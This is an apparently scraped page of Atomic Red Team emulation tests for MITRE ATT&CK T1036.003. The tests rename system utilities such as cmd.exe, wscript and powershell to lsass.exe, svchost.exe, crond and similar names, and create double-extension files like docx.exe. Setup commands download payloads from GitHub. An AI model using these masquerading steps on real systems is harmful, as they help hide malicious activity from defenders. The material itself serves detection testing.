Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)
Atomic Test #2 - Masquerading as FreeBSD or Linux crond process.
Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe
Atomic Test #4 - Masquerading - wscript.exe running as svchost.exe
Atomic Test #5 - Masquerading - powershell.exe running as taskhostw.exe
Atomic Test #6 - Masquerading - non-windows exe running as windows exe
Atomic Test #7 - Masquerading - windows exe running as different windows exe
Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.
Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second timeout cancels the session
Supported Platforms: Windows
auto_generated_guid: 5ba5a3d1-cf3c-4499-968a-a93155d1f717
1
command_prompt
copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
%SystemRoot%\Temp\lsass.exe /B
del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon.
Upon successful execution, sh is renamed to 1
crond
Supported Platforms: Linux
auto_generated_guid: a315bfff-7a98-403b-b442-2ea1b255e556
1
sh
1
2
cp /bin/sh /tmp/crond;
echo 'sleep 5' | /tmp/crond
1
rm /tmp/crond
Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe.
Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path.
Supported Platforms: Windows
auto_generated_guid: 3a2a578b-0a01-46e4-92e3-62e2859b42f0
1
command_prompt
copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y
cmd.exe /c %APPDATA%\notepad.exe /B
del /Q /F %APPDATA%\notepad.exe >nul 2>&1
Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe.
Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder
Supported Platforms: Windows
auto_generated_guid: 24136435-c91a-4ede-9da1-8b284a1c1a23
1
command_prompt
copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y
cmd.exe /c %APPDATA%\svchost.exe "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs"
del /Q /F %APPDATA%\svchost.exe >nul 2>&1
1
powershell
1
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs") {exit 0} else {exit 1}
1
2
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs"
Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe.
Upon successful execution, powershell.exe is renamed as taskhostw.exe and executed from non-standard path.
Supported Platforms: Windows
auto_generated_guid: ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa
1
command_prompt
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y
cmd.exe /K %APPDATA%\taskhostw.exe
del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
Copies an exe, renames it as a windows exe, and launches it to masquerade as a real windows exe
Upon successful execution, powershell will execute T1036.003.exe as svchost.exe from on a non-standard path.
Supported Platforms: Windows
auto_generated_guid: bc15c13f-d121-4b1f-8c7d-28d95854d086
| Name | Description | Type | Default Value | |——|————-|——|—————| | outputfile | path of file to execute | path | ($env:TEMP + “\svchost.exe”)| | inputfile | path of file to copy | path | PathToAtomicsFolder\T1036.003\bin\T1036.003.exe|
1
powershell
1
2
3
4
copy "#{inputfile}" #{outputfile}
try { $myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id }
catch { $_; exit $_.Exception.HResult}
Stop-Process -ID $myT1036_003
1
Remove-Item #{outputfile} -Force -ErrorAction Ignore
1
powershell
1
if (Test-Path "#{inputfile}") {exit 0} else {exit 1}
1
2
New-Item -Type Directory (split-path "#{inputfile}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/bin/T1036.003.exe" -OutFile "#{inputfile}"
Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe
Supported Platforms: Windows
auto_generated_guid: c3d24a39-2bfe-4c6a-b064-90cd73896cb0
| Name | Description | Type | Default Value | |——|————-|——|—————| | outputfile | path of file to execute | path | ($env:TEMP + “\svchost.exe”)| | inputfile | path of file to copy | path | $env:ComSpec|
1
powershell
1
2
3
copy "#{inputfile}" #{outputfile}
$myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id
Stop-Process -ID $myT1036_003
1
Remove-Item #{outputfile} -Force -ErrorAction Ignore
Detect LSM running from an incorrect directory and an incorrect service account This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file to the C:\ folder.
Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from non-standard path.
Supported Platforms: Windows
auto_generated_guid: 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f
1
command_prompt
copy C:\Windows\System32\cmd.exe C:\lsm.exe
C:\lsm.exe /c echo T1036.003 > C:\T1036.003.txt
del C:\T1036.003.txt >nul 2>&1
del C:\lsm.exe >nul 2>&1
download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched.
e.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc] (Quartelyreport.docx.exe)
Supported Platforms: Windows
auto_generated_guid: c7fa0c3b-b57f-4cba-9118-863bf4e653fc
| Name | Description | Type | Default Value | |——|————-|——|—————| | exe_path | path to exe to use when creating masquerading files | path | C:\Windows\System32\calc.exe| | vbs_path | path of vbs to use when creating masquerading files | path | PathToAtomicsFolder\T1036.003\src\T1036.003_masquerading.vbs| | ps1_path | path of powershell script to use when creating masquerading files | path | PathToAtomicsFolder\T1036.003\src\T1036.003_masquerading.ps1|
1
command_prompt
copy "#{exe_path}" %temp%\T1036.003_masquerading.docx.exe /Y
copy "#{exe_path}" %temp%\T1036.003_masquerading.pdf.exe /Y
copy "#{exe_path}" %temp%\T1036.003_masquerading.ps1.exe /Y
copy "#{vbs_path}" %temp%\T1036.003_masquerading.xls.vbs /Y
copy "#{vbs_path}" %temp%\T1036.003_masquerading.xlsx.vbs /Y
copy "#{vbs_path}" %temp%\T1036.003_masquerading.png.vbs /Y
copy "#{ps1_path}" %temp%\T1036.003_masquerading.doc.ps1 /Y
copy "#{ps1_path}" %temp%\T1036.003_masquerading.pdf.ps1 /Y
copy "#{ps1_path}" %temp%\T1036.003_masquerading.rtf.ps1 /Y
%temp%\T1036.003_masquerading.docx.exe
%temp%\T1036.003_masquerading.pdf.exe
%temp%\T1036.003_masquerading.ps1.exe
%temp%\T1036.003_masquerading.xls.vbs
%temp%\T1036.003_masquerading.xlsx.vbs
%temp%\T1036.003_masquerading.png.vbs
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.003_masquerading.doc.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.003_masquerading.pdf.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.003_masquerading.rtf.ps1
del /f %temp%\T1036.003_masquerading.docx.exe > nul 2>&1
del /f %temp%\T1036.003_masquerading.pdf.exe > nul 2>&1
del /f %temp%\T1036.003_masquerading.ps1.exe > nul 2>&1
del /f %temp%\T1036.003_masquerading.xls.vbs > nul 2>&1
del /f %temp%\T1036.003_masquerading.xlsx.vbs > nul 2>&1
del /f %temp%\T1036.003_masquerading.png.vbs > nul 2>&1
del /f %temp%\T1036.003_masquerading.doc.ps1 > nul 2>&1
del /f %temp%\T1036.003_masquerading.pdf.ps1 > nul 2>&1
del /f %temp%\T1036.003_masquerading.rtf.ps1 > nul 2>&1
1
powershell
1
if (Test-Path "#{vbs_path}") {exit 0} else {exit 1}
1
2
New-Item -Type Directory (split-path "#{vbs_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs" -OutFile "#{vbs_path}"
1
if (Test-Path "#{ps1_path}") {exit 0} else {exit 1}
1
2
New-Item -Type Directory (split-path "#{ps1_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.ps1" -OutFile "#{ps1_path}"